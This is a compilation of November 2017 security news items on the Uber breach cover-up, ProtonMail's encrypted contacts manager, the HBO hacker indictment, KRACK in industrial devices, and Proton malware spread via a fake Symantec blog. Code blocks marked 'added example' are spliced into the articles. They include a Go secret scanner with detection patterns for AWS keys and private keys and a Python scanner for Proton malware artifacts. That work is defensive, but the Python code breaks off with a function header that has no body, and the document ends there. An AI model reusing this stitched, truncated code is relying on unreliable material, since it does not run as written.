After Getting Hacked, Uber Paid Hackers $100,000 to Keep Data Breach Secret
22.11.2017 thehackernews Incident

Uber is in the headlines once again, this time for concealing last year's data breach, which exposed the personal data of 57 million customers and drivers.
On Tuesday, Uber announced that the company suffered a massive data breach in October 2016 that exposed names, e-mail addresses and phone numbers of 57 million Uber riders and drivers along with driver license numbers of around 600,000 drivers.
However, instead of disclosing the breach, the company paid $100,000 in ransom to the two hackers who had access to the data in exchange for keeping the incident secret and deleting the information, according to a report published by Bloomberg.
Uber said none of its own systems were breached; rather, two individuals outside the company inappropriately accessed and downloaded the data of 57 million Uber riders and drivers that was stored on a third-party cloud-based service.
The cyberattack exposed the names and driver license numbers of some 600,000 drivers in the United States, and the names, emails, and mobile phone numbers of around 57 million Uber users worldwide, which included drivers as well.
However, the company said other personal details, such as trip location history, credit card numbers, bank account numbers, Social Security numbers or dates of birth, were not accessed in the attack.
Uber Hid 57 Million User Data Breach For Over a Year
According to Bloomberg report, former Uber CEO Travis Kalanick learned of the cyber attack in November 2016, when the company was negotiating with the Federal Trade Commission (FTC) on a privacy settlement.
So, the company chose to pay the two hackers $100,000 to delete the stolen information and keep quiet about the incident and finally agreed to the FTC settlement three months ago, without admitting any wrongdoing.
Uber Technologies Inc. only told the FTC about the October 2016 data incident on Tuesday, when the breach was made public by Bloomberg.
The secret payment has now cost two Uber security executives their jobs over their handling of the incident.
Uber CEO Dara Khosrowshahi has reportedly asked for the resignation of Chief Security Officer Joe Sullivan and one of his deputies, Craig Clark, who worked to keep the attack quiet.
"None of this should have happened, and I will not make excuses for it. While I cannot erase the past, I can commit on behalf of every Uber employee that we will learn from our mistakes," Khosrowshahi said.
"We are changing the way we do business, putting integrity at the core of every decision we make and working hard to earn the trust of our customers."
Uber is notifying regulatory authorities and offering affected drivers free credit monitoring and identity theft protection.
The company also says it is monitoring the affected accounts for fraudulent activity and that riders do not need to take any action in response to the incident. Uber may still force its customers to reset their passwords for its app.

ProtonMail Launches Encrypted Contacts Manager
22.11.2017 securityweek  Safety
Swiss-based encrypted email services provider ProtonMail announced on Tuesday the launch of a new tool designed to help users securely manage their contacts.

According to the vendor, the new ProtonMail contacts manager has been in development for more than a year and it adds powerful functionality for managing the address book.

What makes ProtonMail Contacts highly secure is the fact that it uses zero-access encryption. This means contact information is encrypted and it can only be decrypted by the user – not even ProtonMail can access the data.

The company says the new encrypted contacts manager is ideal for journalists and other individuals for whom it’s critical that contact information is protected.

ProtonMail noted that the new feature secures phone numbers, physical addresses and other information added by the user, but it does not use zero-access encryption for email addresses as it would break email filtering functionality and it wouldn’t represent a significant privacy improvement considering that the service needs to know the recipient’s email address in order to deliver messages.


On the other hand, the new ProtonMail Contacts tool does provide some protection for email addresses by using digital signatures to verify their integrity. The digital signatures mechanism, which provides a cryptographic guarantee that contact data hasn’t been tampered with, covers all the information stored in the address book, not only email addresses. If the application detects an invalid signature, it displays an error message to alert the user.

“This is a big security benefit for many reasons,” ProtonMail said in a blog post. “For example, if an attacker wanted to intercept the communications between you and a sensitive contact, one way to do it could be to secretly change the email address or phone number you have saved for that contact, such as changing john.smith(at)protonmail.com to john.snnith(at)protonmail.com, which might escape your notice.”

The new contacts manager relies on a new public/private key pair for each account. The private key is protected by the user's password and is only ever decrypted on the client side, so ProtonMail never holds a usable copy of the key that decrypts contact data. The same key pair is used both for encrypting contact information and for signing it.
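To make the encrypt-and-sign split concrete, here is an added example in Go, written for this page rather than taken from ProtonMail's client (which uses OpenPGP keys): the email stays in the clear, the other fields are encrypted with AES-256-GCM under a client-held key, and one Ed25519 signature covers both the cleartext email and the ciphertext. The key material, the `contact-v1` framing in `signedBytes`, and the sample contact values are assumptions of the example. The john.smith to john.snnith substitution quoted above then fails signature verification before any decryption is attempted, which is exactly the check the article describes.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/ed25519"
	"crypto/rand"
	"encoding/json"
	"errors"
	"fmt"
)

// Contact as the user sees it: Email stays in the clear (the mail service needs it
// for delivery and filtering); Name, Phone and Address get zero-access encryption.
type Contact struct{ Name, Email, Phone, Address string }

// StoredContact is the server-side record: cleartext email, ciphertext, one signature over both.
type StoredContact struct {
	Email      string
	Ciphertext []byte // nonce || AES-256-GCM(private fields) with Email as associated data
	Signature  []byte // Ed25519 over signedBytes(Email, Ciphertext)
}

// ClientKeys is per-account key material that never leaves the client. Assumption of
// this example: a random AES key plus an Ed25519 pair stand in for the real OpenPGP keys.
type ClientKeys struct {
	aead     cipher.AEAD
	signPub  ed25519.PublicKey
	signPriv ed25519.PrivateKey
}

var ErrTampered = errors.New("contact signature invalid: stored record was modified")

func NewClientKeys() (*ClientKeys, error) {
	encKey := make([]byte, 32)
	if _, err := rand.Read(encKey); err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(encKey)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &ClientKeys{aead: aead, signPub: pub, signPriv: priv}, nil
}

// signedBytes binds email and ciphertext with a version label and a length prefix,
// so neither half can be swapped for another record's without breaking the signature.
func signedBytes(email string, ct []byte) []byte {
	var b bytes.Buffer
	fmt.Fprintf(&b, "contact-v1\x00%d:%s", len(email), email)
	b.Write(ct)
	return b.Bytes()
}

// Seal encrypts everything except Email, then signs email and ciphertext together.
func (k *ClientKeys) Seal(c Contact) (StoredContact, error) {
	private, err := json.Marshal(Contact{Name: c.Name, Phone: c.Phone, Address: c.Address})
	if err != nil {
		return StoredContact{}, err
	}
	nonce := make([]byte, k.aead.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return StoredContact{}, err
	}
	ct := k.aead.Seal(nonce, nonce, private, []byte(c.Email))
	sig := ed25519.Sign(k.signPriv, signedBytes(c.Email, ct))
	return StoredContact{Email: c.Email, Ciphertext: ct, Signature: sig}, nil
}

// Open verifies the signature before touching the ciphertext; any mismatch means the
// stored record (cleartext email or encrypted fields) was altered, and it is rejected.
func (k *ClientKeys) Open(s StoredContact) (Contact, error) {
	if !ed25519.Verify(k.signPub, signedBytes(s.Email, s.Ciphertext), s.Signature) {
		return Contact{}, ErrTampered
	}
	ns := k.aead.NonceSize()
	if len(s.Ciphertext) < ns {
		return Contact{}, ErrTampered
	}
	pt, err := k.aead.Open(nil, s.Ciphertext[:ns], s.Ciphertext[ns:], []byte(s.Email))
	if err != nil {
		return Contact{}, ErrTampered
	}
	var p Contact
	if err := json.Unmarshal(pt, &p); err != nil {
		return Contact{}, err
	}
	return Contact{Name: p.Name, Email: s.Email, Phone: p.Phone, Address: p.Address}, nil
}
```

Two design points carry over to any real implementation: the signature must cover the cleartext field as well as the ciphertext (otherwise the server can rewrite the email unnoticed), and the cleartext email is also passed as GCM associated data, so even a valid-looking ciphertext cannot be re-attached to a different address.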

The new contacts manager is currently only available for the web version of ProtonMail, but it will soon be added to the iOS and Android apps as well. Future versions of the tool will also allow users to store keys created for sending PGP-encrypted messages, ProtonMail said.

The source code for ProtonMail’s web client, including the contacts manager, is available on GitHub.

ProtonMail Contacts – ProtonMail launches world’s first encrypted contacts manager
22.11.2017 securityaffairs Safety

ProtonMail launched ProtonMail Contacts, the world’s first contact manager with both zero-access encryption and digital signature verification.
ProtonMail is announcing today the launch of the world’s first encrypted contacts manager that also features digital signature verification. Starting immediately, the new contacts manager is available to all of ProtonMail’s 5 million users around the world.
The development and launch of this feature was driven by the feedback that the company received from many of its users in the investigative journalism space. “Last year, we had the unique opportunity to meet with many of our users in the field at the Second Asian Investigative Journalism Conference in Kathmandu, Nepal, and one message that we heard over and over again was the need for better ways to protect sources,” says ProtonMail co-founder Dr. Andy Yen, “the new encrypted contacts manager today is the result of over one year of research and development into how we can best meet the needs of the thousands of activists, journalists, and dissidents who rely on ProtonMail to protect their privacy.“
In addition to protecting sensitive contact details with zero-access encryption (meaning that ProtonMail itself cannot decrypt the data, and cannot reveal the private contact details to third parties), ProtonMail’s new contact manager also utilizes digital signatures to verify the integrity of contacts data. This provides a cryptographic guarantee that nobody (not even ProtonMail), has tampered with the contacts data.
“Combining encryption with digital signatures provides powerful protection that guarantees not only the privacy, but also the authenticity of the contacts saved in ProtonMail, and reduces the need to trust ProtonMail, as even we cannot access or change this information without your knowledge,” says Dr. Yen. In line with standard company practice, the software behind ProtonMail’s encrypted contacts manager is fully open source.
-> For more details about ProtonMail’s encrypted contacts manager, please refer to our launch blog post here: https://protonmail.com/blog/encrypted-contacts-manager/
-> The link to this press release can be found here: https://protonmail.com/blog/contacts-press-release/
-> ProtonMail’s media kit can be found here: https://protonmail.com/media-kit/

U.S. charges Iranian state-sponsored hacker over ‘Game of Thrones’ HBO hack
22.11.2017 securityaffairs BigBrothers

The US Department of Justice has charged Iranian computer expert Behzad Mesri over the 'Game of Thrones' HBO hack; he has also worked for the Iranian military.
On Tuesday, the man was charged with stealing scripts and plot summaries for 'Game of Thrones'.

Manhattan US Attorney Joon Kim said Mesri "had previously hacked computer systems for the Iranian military". The man threatened to release the stolen data unless HBO paid a $6 million ransom in Bitcoin.

“Behzad Mesri, an Iranian national who had previously hacked computer systems for the Iranian military, allegedly infiltrated HBO’s systems, stole proprietary data, including scripts and plot summaries for unaired episodes of Game of Thrones, and then sought to extort HBO of $6 million in Bitcoins.” said U.S. Attorney Joon H. Kim. “Mesri now stands charged with federal crimes, and although not arrested today, he will forever have to look over his shoulder until he is made to face justice. American ingenuity and creativity is to be cultivated and celebrated — not hacked, stolen, and held for ransom. For hackers who test our resolve in protecting our intellectual property — even those hiding behind keyboards in countries far away — eventually, winter will come.”

Behzad Mesri, who is still at large, is an Iran-based hacker who also goes online with the moniker Skote Vahshat.

Mesri faces seven counts in the United States, including wire fraud, aggravated identity theft and four counts of computer fraud.


The DoJ accuses the man of being behind the cyber attacks against HBO between May and August, during which he stole scripts and plot summaries for then-unaired episodes of "Game of Thrones" and of several other shows.

Mesri compromised multiple user accounts belonging to HBO employees and other authorized users; with that access he reached the company's servers and stole confidential and proprietary information.

“Over the course of several months, MESRI used that unauthorized access to steal confidential and proprietary information belonging to HBO, which he then exfiltrated to servers under his control.” states the press release published by the US Department of Justice.

“Through the course of the intrusions into HBO’s systems, MESRI was responsible for stealing confidential and proprietary data belonging to HBO, including, but not limited to: (a) confidential video files containing unaired episodes of original HBO television programs, including episodes of “Barry,” “Ballers,” “Curb Your Enthusiasm,” “Room 104,” and “The Deuce;” (b) scripts and plot summaries for unaired programming, including but not limited to episodes of “Game of Thrones;”(c) confidential cast and crew contact lists; (d) emails belonging to at least one HBO employee; (e) financial documents; and (f) online credentials for HBO social media accounts (collectively, the “Stolen Data”).”

According to the US prosecutors, Mesri previously conducted computer attacks on behalf of the Iranian military that targeted nuclear software systems and Israeli infrastructure.

Prosecutors say the Iranian man was a member of the Iran-based Turk Black Hat Security hacking group, which defaced hundreds of websites in the United States and around the world.

“MESRI is an Iran-based computer hacker who had previously worked on behalf of the Iranian military to conduct computer network attacks that targeted military systems, nuclear software systems, and Israeli infrastructure.” continues the DoJ.

“At certain times, MESRI has been a member of an Iran-based hacking group called the Turk Black Hat security team and, as a member of that group, conducted hundreds of website defacements using the online hacker pseudonym “Skote Vahshat” against websites in the United States and elsewhere.”

More Industrial Products at Risk of KRACK Attacks
22.11.2017 securityweek 
An increasing number of vendors have warned customers over the past weeks that their industrial networking products are vulnerable to the recently disclosed Wi-Fi attack method known as KRACK.

The KRACK (Key Reinstallation Attack) flaws affect the WPA and WPA2 protocols and they allow a hacker within range of the targeted device to launch a man-in-the-middle (MitM) attack and decrypt or inject data. A total of ten CVE identifiers have been assigned to these security bugs.

The vulnerabilities impact many products, including devices designed for use in industrial environments. The first industrial solutions providers to warn customers about the KRACK attack were Cisco, Rockwell Automation and Sierra Wireless.

Cisco said the flaws affect some industrial routers and access points, for which the company has released updates. Rockwell and Sierra Wireless have also identified impacted products and provided patches and mitigations.

Other industrial solutions providers have come forward in the past weeks to admit that their products are affected.

Siemens said the KRACK vulnerabilities affect some of its SCALANCE, SIMATIC, RUGGEDCOM, and SINAMICS products. The company is working on releasing updates that will address the security holes and, in the meantime, it has provided some mitigations.

Swiss-based ABB informed customers that TropOS broadband mesh routers and bridges running Mesh OS 8.5.2 or prior are also vulnerable to KRACK attacks. ABB has yet to release patches, but it did provide workarounds and mitigations.

German industrial automation firm Phoenix Contact also confirmed that three of the KRACK flaws affect some of its BL2, FL, ITC, RAD, TPC and VMT products. The company said the impact is limited for some of its products, and pointed out that in many cases the attacker would have to be inside the plant in order to conduct an attack.


Phoenix is working on patching the vulnerabilities in affected products. The vendor has advised customers using devices running Windows to install the security updates provided by Microsoft.

Lantronix informed customers that several of its wireless connectivity solutions are impacted by KRACK, including PremierWave ethernet-to-WiFi gateways, WiPort wireless ethernet bridges, MatchPort programmable embedded device servers, xPico embedded IoT WiFi modules, SGX IoT device gateways, and WiBox wireless device servers.

The company has released a patch for PremierWave 2050. For the other products, fixes are expected to become available by the end of the year.

Some Johnson Controls products may also be vulnerable to KRACK attacks. The company’s product security and incident response team (PSIRT) is currently assessing the impact of these flaws.

Kaspersky Lab’s ICS-CERT team pointed out that while KRACK attacks can be launched against industrial control systems (ICS) -- for example, some PLCs use Wi-Fi for remote management -- the biggest risk is to network communication devices, smartphones and tablets used by engineers and operators for remote access to ICS.

“In most cases KRACK attacks present virtually no risk to those large industrial and critical infrastructure systems that do not use 802.11 technologies. Today, such systems constitute an absolute majority,” explained Ekaterina Rudina, senior system analyst in Kaspersky’s ICS-CERT team. “Even in cases where these technologies may be used, physical restrictions on access to the controlled zone (e.g., a specific manufacturing unit) would prevent an attack from being carried out.”

“The main risk zone still encompasses those industrial sectors the security of which is given a lower priority than that of critical infrastructure systems and where using wireless technologies to upgrade systems or meet industrial network maintenance needs has become necessary but where compliance with the ‘best practices’ supported by major vendors is not possible because the changes required are too complicated or too costly,” Rudina added.

Unbelievable: Uber concealed data breach that exposed 57 Million records in 2016
22.11.2017 securityaffairs Incident

Unbelievable: Uber concealed data breach that exposed 57 Million records in 2016 and paid hackers to delete stolen records.
Uber CEO Dara Khosrowshahi announced on Tuesday that hackers had accessed the personal data of 57 million of its users; worse, the company covered up the hack for more than a year.

The attackers accessed also the names and driver’s license numbers of roughly 600,000 of its drivers in the United States.

The hack happened in 2016 and, according to a report published by Bloomberg, required little effort: the attackers obtained credentials from a private GitHub site used by Uber's development team. They then tried to blackmail Uber, demanding $100,000 from the company in exchange for not publishing the stolen data.

“Two attackers accessed a private GitHub coding site used by Uber software engineers and then used login credentials they obtained there to access data stored on an Amazon Web Services account that handled computing tasks for the company. From there, the hackers discovered an archive of rider and driver information. Later, they emailed Uber asking for money, according to the company.” states Bloomberg.
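The path Bloomberg describes starts with credentials sitting in a repository. As an added example, not Uber's tooling or anything from the Bloomberg report, the following Go program is the kind of secret scan a team would run in a pre-commit hook or CI job over files about to be pushed: it flags AWS access key IDs, 40-character secrets assigned to an aws_secret_access_key-style variable (with an entropy floor so placeholders are ignored), and PEM private-key headers. The settings file it scans is constructed for the example and uses the placeholder key values from AWS's own documentation; the patterns, the 3.5-bit entropy threshold and the file layout are assumptions.

```go
package main

import (
	"bufio"
	"fmt"
	"math"
	"regexp"
	"strings"
)

// SampleRepoFile is a constructed stand-in for a settings file committed to a
// private repository. The key values are the placeholders AWS uses in its own
// documentation, not real credentials; the PEM body is filler.
const SampleRepoFile = `# deploy/settings.env
APP_ENV=production
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
S3_BUCKET=rider-driver-archive
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAconstructedsamplebodynotarealkey
-----END RSA PRIVATE KEY-----
`

// Finding is one credential-shaped match, with the 1-based line it sits on.
type Finding struct {
	Line  int
	Kind  string
	Match string
}

var (
	// Long-term (AKIA) and temporary STS (ASIA) access key IDs: 20 uppercase alphanumerics.
	awsKeyID = regexp.MustCompile(`\b(?:AKIA|ASIA)[0-9A-Z]{16}\b`)
	// A 40-character secret assigned to an aws_secret_access_key-style variable.
	awsSecret = regexp.MustCompile(`(?i)aws[_-]?secret[_-]?(?:access[_-]?)?key\s*[:=]\s*["']?([A-Za-z0-9/+=]{40})`)
	// Any PEM private-key header: RSA, EC, OPENSSH, ENCRYPTED or bare PKCS#8.
	pemHeader = regexp.MustCompile(`-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----`)
)

// shannonEntropy returns bits per character. Real 40-character AWS secrets
// score above 4; placeholders such as forty "x" characters score near 0.
func shannonEntropy(s string) float64 {
	counts := map[rune]int{}
	total := 0
	for _, r := range s {
		counts[r]++
		total++
	}
	h := 0.0
	for _, c := range counts {
		p := float64(c) / float64(total)
		h -= p * math.Log2(p)
	}
	return h
}

// ScanText walks the text line by line and returns every match. Secret
// candidates below the entropy floor are dropped so placeholders do not fire.
func ScanText(text string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(text))
	for n := 1; sc.Scan(); n++ {
		line := sc.Text()
		if m := awsKeyID.FindString(line); m != "" {
			out = append(out, Finding{n, "aws-access-key-id", m})
		}
		if m := awsSecret.FindStringSubmatch(line); m != nil && shannonEntropy(m[1]) >= 3.5 {
			out = append(out, Finding{n, "aws-secret-access-key", m[1]})
		}
		if pemHeader.MatchString(line) {
			out = append(out, Finding{n, "private-key-block", strings.TrimSpace(line)})
		}
	}
	return out
}

func main() {
	for _, f := range ScanText(SampleRepoFile) {
		fmt.Printf("line %d  %-22s %s\n", f.Line, f.Kind, f.Match)
	}
}
```

A scan like this is a backstop, not the fix: any key it finds in a commit, private repository or not, should be treated as compromised and rotated, and engineers should not be holding long-lived keys in the first place where a short-lived, role-based credential would do.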

In a statement on Tuesday, Khosrowshahi said the intruders accessed cloud-hosted data stores:

“I recently learned that in late 2016 we became aware that two individuals outside the company had inappropriately accessed user data stored on a third-party cloud-based service that we use. The incident did not breach our corporate systems or infrastructure.

At the time of the incident, we took immediate steps to secure the data and shut down further unauthorized access by the individuals. We subsequently identified the individuals and obtained assurances that the downloaded data had been destroyed. We also implemented security measures to restrict access to and strengthen controls on our cloud-based storage accounts.” reads the CEO’s statement.

“You may be asking why we are just talking about this now, a year later. I had the same question, so I immediately asked for a thorough investigation of what happened and how we handled it.”


The situation gets worse: rather than notifying customers and law enforcement, as California's data breach notification law requires, Uber's chief security officer Joe Sullivan had the ransom paid and the incident concealed. The payout was disguised as a bug bounty award, complete with signed non-disclosure agreements. This was a convenient cover, because Uber runs a bug bounty program that encourages white hat hackers to responsibly disclose vulnerabilities affecting its services.

“Uber acquiesced to the demands, and then went further. The company tracked down the hackers and pushed them to sign nondisclosure agreements, according to the people familiar with the matter. To further conceal the damage, Uber executives also made it appear as if the payout had been part of a “bug bounty” — a common practice among technology companies in which they pay hackers to attack their software to test for soft spots.” reported The New York Times.

“The details of the attack remained hidden until Tuesday. The ride-hailing company said it had discovered the breach as part of a board investigation into Uber’s business practices.”

As a result of the new board investigation Sullivan and one of his lieutenants were ousted.

The CEO said that nothing like this will happen again, because Uber is making customers' security and trust the pillar of its business.

“While I can’t erase the past, I can commit on behalf of every Uber employee that we will learn from our mistakes. We are changing the way we do business, putting integrity at the core of every decision we make and working hard to earn the trust of our customers.” added Khosrowshahi.

The CEO added that outside forensics experts have found no evidence that the more sensitive data (trip location history, credit card numbers, bank account numbers, Social Security numbers or dates of birth) was downloaded; in any case, the company is monitoring the affected accounts for fraudulent activity.

Below the list of actions the company has taken in response to the incident:

I’ve asked Matt Olsen, a co-founder of a cybersecurity consulting firm and former general counsel of the National Security Agency and director of the National Counterterrorism Center, to help me think through how best to guide and structure our security teams and processes going forward. Effective today, two of the individuals who led the response to this incident are no longer with the company.
We are individually notifying the drivers whose driver’s license numbers were downloaded.
We are providing these drivers with free credit monitoring and identity theft protection.
We are notifying regulatory authorities.
While we have not seen evidence of fraud or misuse tied to the incident, we are monitoring the affected accounts and have flagged them for additional fraud protection.
The New York Attorney General, Eric Schneiderman, has also launched an investigation into the Uber data breach.

This isn’t the first security breach the company has experienced: it suffered a data breach in May 2014 that was only discovered in February 2015.

In that attack, the names and driver’s license numbers of roughly 50,000 of the company’s drivers were compromised.

In June 2016, security experts from the firm Integrity found more than a dozen flaws in the Uber website that could be exploited by hackers to access driver and passenger data. The researchers discovered a total of 14 security issues, four of which cannot be disclosed.

Uber Hacked: Information of 57 Million Users Accessed in Covered-Up Breach
22.11.2017 securityweek  CyberCrime
Uber Covered Up Massive Hack in 2016 for More Than a Year

Uber said Tuesday that hackers accessed the personal data of 57 million of its users in a breach that had been covered up by the company for more than a year.

Stolen information included the names, email addresses and mobile phone numbers of customers around the world, while the names and driver’s license numbers of roughly 600,000 of its drivers in the United States were accessed.

“I recently learned that in late 2016 we became aware that two individuals outside the company had inappropriately accessed user data stored on a third-party cloud-based service that we use,” Uber CEO Dara Khosrowshahi wrote in a blog post Tuesday, adding that the incident did not breach Uber’s corporate systems or infrastructure.

According to a report from Bloomberg, attackers obtained credentials from a private GitHub site used by Uber’s software developers, which were used to access data stored on an Amazon Web Services (AWS) account.

Uber reportedly paid $100,000 to the hackers as a ransom payment in order to limit fallout from the breach. The company did not provide any details on such payment, but said “we subsequently identified the individuals and obtained assurances that the downloaded data had been destroyed.”

Uber said that two employees “who led the response to the incident" are no longer with the company. While the company did not provide names, some reports indicate that Chief Security Officer Joe Sullivan has been let go. Uber hired Sullivan, Facebook's former security chief, as its first ever Chief Security Officer in April 2015.

SecurityWeek has contacted Uber for comment on the ransom payment and Sullivan’s rumored departure.

“Today’s incident at Uber is an example of how unprotected machine identities can lead to data breaches. Access to cloud services, such as Amazon AWS, is secured with SSH keys that are often outside the control of security teams,” Kevin Bocek, chief security strategist for Venafi, told SecurityWeek. “Unfortunately, we frequently see SSH keys that provide access to AWS left unprotected in GitHub. Without robust SSH intelligence and strong security controls, malicious actors can abuse these keys while flying under the radar of most other security controls,” Bocek added.

“The Uber breach is staggering not so much in its magnitude, but more so in the extensive efforts the company seems to have made in concealing the breach in violation of their customers’ trust and perhaps laws that require disclosure,” John Gunn, Chief Marketing Officer at Vasco Data Security, told SecurityWeek.

Uber does run a bug bounty program to encourage security researchers to responsibly disclose vulnerabilities found across its services.

In June 2016, researchers from Portugal-based security consulting and audit firm Integrity identified more than a dozen vulnerabilities in Uber websites and services, including issues that could have been exploited to access driver and passenger information.

In 2015, Uber disclosed two security incidents: one where an unauthorized party gained access to the driver’s license numbers of roughly 50,000 drivers, and a software bug that exposed the personal details of hundreds of U.S. drivers.

Has Everyone Really Been Hacked?
22.11.2017 securityweek  Hacking
There is little doubt that fear sells security products, hikes law enforcement agency (LEA) budgets and sells newspapers. Both the security industry and government agencies benefit from sensational headlines, leaving people wondering what the real truth may be. So when UK newspaper The Times ran a headline, 'Everyone has been hacked, say police', it leaves the question: is this just more scaremongering or a true reflection on the state of security?

To my knowledge and belief, I have not been hacked (yet) -- so the headline is patently untrue. But I (and indeed everyone) am frequently targeted; I'm fairly certain I have dozens of unclicked malicious links and files in my mail system. Here's the first method of scaremongering: security vendors, LEAs and parts of the media will often claim, 'millions of users hit by new malware'. The truth is most likely that millions of users have been targeted or can potentially be affected, not that millions of users have been infected.

The Times headline is very clear: everyone has been hacked. But this is not what the police actually said. According to The Times' own report, "Virtually everyone in the country is likely to have had their personal data hacked and placed for sale on the dark web, police have said."

This is bad enough, but it is not the same as being personally hacked. What the police (in this case Peter Goodman, the National Police Chiefs' Council lead for cybercrime and the Chief Constable for Derbyshire) are saying is that everybody will have had some personal data taken by cybercriminals via third party breaches (such as Yahoo, LinkedIn, TalkTalk and more recently Equifax). Whether the amount of personal data stolen in this way is more or less than the personal data we willingly give to Google, Microsoft and Facebook is a separate -- but equally valid -- question.

Nor do we know what personal data has been stolen -- some personal data is clearly more valuable to cybercriminals (and dangerous to us) than other personal data. However, we should never dismiss any data loss as being unimportant. Cybercriminals, and especially state-affiliated criminals, have as much ability to use big data correlation and analysis as the big security vendors and government agencies. Little bits of data from different sources can be matched together to form a surprisingly detailed picture of us.

The question then remains, how accurate is the police view that we have all been affected by third-party data loss?

Chris Morales, head of security analytics at Vectra, comments, "Anyone who has performed any online transaction has personal data on the internet. Even worse, personal information exists in locations people are not even aware of or have any control over.

Equifax impacted more than 145 million consumers. Of those, around 700,000 were believed to be in the UK. That is just one recent breach.

Based on data reported from breachlevelindex.com [a site sponsored by Gemalto], there have been 9,198,580,293 data records lost or stolen since 2013. That's more data records than people in the world. For the UK specifically, they report a number of 137,516,163 records stolen since 2013, double the population. Therefore, it is a reasonable assumption to make that everyone has been hacked and some more than once." (Notice that Morales accepts the Times' use of the term 'hacked'.)

Chris Roberts, chief security architect at Acalvio, takes a similar stance. "Healthcare has lost between 600 and 700 million records since we started counting," he told SecurityWeek. "That's almost twice the population of the United States. Between all the various high visibility breaches and government losses, it's arguable that everyone's data is already out there. Finally, the quantity of credit cards that are breached on an annual basis would arguably demonstrate that almost everyone has had financial breaches."

Ilia Kolochenko disagrees with the headline, but agrees with the content. "Digitization has become an inalienable part of our everyday lives," he told SecurityWeek. "Even people who have never used a PC or a smartphone have their personal data stored and processed somewhere. Cybercrime is skyrocketing, and the vast majority of digital systems have been breached. However, I think that it's technically incorrect to say that every person was hacked, as our common notion of "hack" implies at least some motive and targeting. Otherwise, we can reasonably say that every person in the world has been hacked many times over."

He has concerns over the headline, but has no issue with the content. "In the matter of general awareness, such announcements are beneficial, as many people still seriously underestimate the growing hydra of cybercrime. Hopefully, the government will finally allocate additional resources that are necessary to fight cybercrime on national and international levels. Right now, law enforcement is seriously under-equipped with technology, qualified personnel and financial resources to prevent, investigate and prosecute digital crime."

The general consensus is that (apart from the headline), the views of Peter Goodman do not represent scaremongering. Stephen Burke, founder and CEO of Cyber Risk Aware adds a rider: "There is a high percentage of people that have been affected by cybercrime -- however, it would be unfair to say that everyone has been a victim. It's possible they could be by virtue of the data that is readily available online and the data that they give out via social media and to companies who handle billing. If this were the case, then there would be too much data for hackers to handle."

Nevertheless, statistics suggest that everyone, from corporate manager to stay-at-home mum and her kids, has had personal data stolen by cybercriminals. Goodman has his own solution: "Mr Goodman said that providing lifetime security for digital devices should be mandatory," says the Times.

That's a big, and frankly unrealistic ask. "We have learned prevention is never going to be enough and at some point it is realistic to assume a breach will occur," said Morales. "At that point, we must be better prepared to detect and respond to the breaches that do happen and that can cause the most damage. The goal should be to reduce the impact of those breaches."

The implication is clear. Just as business is exhorted to plan its response to an inevitable breach, individuals need to plan a response to the seemingly inevitable misuse of their stolen personal data.

macOS Malware Spread Via Fake Symantec Blog
22.11.2017 securityweek  Apple
A newly observed variant of the macOS-targeting Proton malware is spreading through a blog spoofing that of legitimate security company Symantec.

The actor behind this threat created symantecblog[dot]com, a good imitation of the real Symantec blog, and even mirrored content from the original. On this blog, a post about a new version of CoinThief, a piece of malware from 2014, promotes an application called “Symantec Malware Detector,” while in fact distributing OSX.Proton instead.

The domain’s registration information appears to be legitimate, with the same name and address as those used by Symantec, but the email address shows that something is off. Furthermore, the certificate used for the site is a legitimate SSL certificate issued by Comodo and not by Symantec’s own certificate authority.

Links to the fake blog have been spreading on Twitter via both fake and legitimate accounts, Malwarebytes reports. It is possible that the actor behind this campaign used stolen passwords to access legitimate accounts and promote their malicious post. However, it is also possible that people were tricked into promoting the link.

When first run, the Symantec Malware Detector application displays a very simple window, using the Symantec logo, claiming to require authorization to perform a system check. Should the potential victim close the window at this point, the malware won’t be installed, the researchers say.

Should the user agree to run the check, the admin password is requested, a step that results in the malware stealing the password. Next, the app displays a progress bar claiming to be scanning the computer, but Proton is installed in the background.

The Symantec Malware Detector application is nothing more than a malware dropper, and all users who have downloaded it are advised to delete it and attempt to disinfect their systems.

The malware immediately starts gathering user information, such as the admin password and other personally identifying information (PII), and saves all data to a hidden file. Keychain files, browser auto-fill data, 1Password vaults, and GPG passwords are also harvested.

The Proton executable is dropped in the .random directory and is kept running by the com.apple.xpcd.plist launch agent. The stolen data is stored in the .cachedir folder.
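A host check built from the artifact names above, added here as an example and not part of Malwarebytes' write-up. It assumes the launch agent sits under a Library/LaunchAgents directory and points at the payload through a standard ProgramArguments key; the scan root is a parameter, and the fixture it builds is constructed for the demo.

```python
"""Added example (not Malwarebytes' code): look for the OSX.Proton artifacts
named in the article (com.apple.xpcd.plist, .random, .cachedir).

Assumptions not stated in the article: the launch agent lives under a
Library/LaunchAgents directory and names its payload via ProgramArguments.
"""
import os
import plistlib
import tempfile
from pathlib import Path

# Names taken from the article; locations are not given there, so we walk a root.
SUSPICIOUS_PLIST = "com.apple.xpcd.plist"
SUSPICIOUS_DIRS = {".random", ".cachedir"}


def scan_for_proton(root: str) -> dict:
    """Walk `root` and collect the indicators described in the article.

    Returns lists of matching plists, matching hidden directories, and the
    program each matching plist would launch (so an analyst can see the target).
    Apple's own launch agents ship under /System/Library, so a 'com.apple.*'
    plist inside a user's Library is itself worth a second look.
    """
    findings = {"plists": [], "dirs": [], "programs": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d in SUSPICIOUS_DIRS:
                findings["dirs"].append(os.path.join(dirpath, d))
        for f in filenames:
            if f != SUSPICIOUS_PLIST:
                continue
            full = os.path.join(dirpath, f)
            findings["plists"].append(full)
            try:
                with open(full, "rb") as fh:
                    plist = plistlib.load(fh)
            except (plistlib.InvalidFileException, OSError):
                continue  # unreadable or not a plist: the name match is still reported
            args = plist.get("ProgramArguments") or []
            program = plist.get("Program") or (args[0] if args else None)
            if program:
                findings["programs"].append(program)
    return findings


def is_likely_infected(findings: dict) -> bool:
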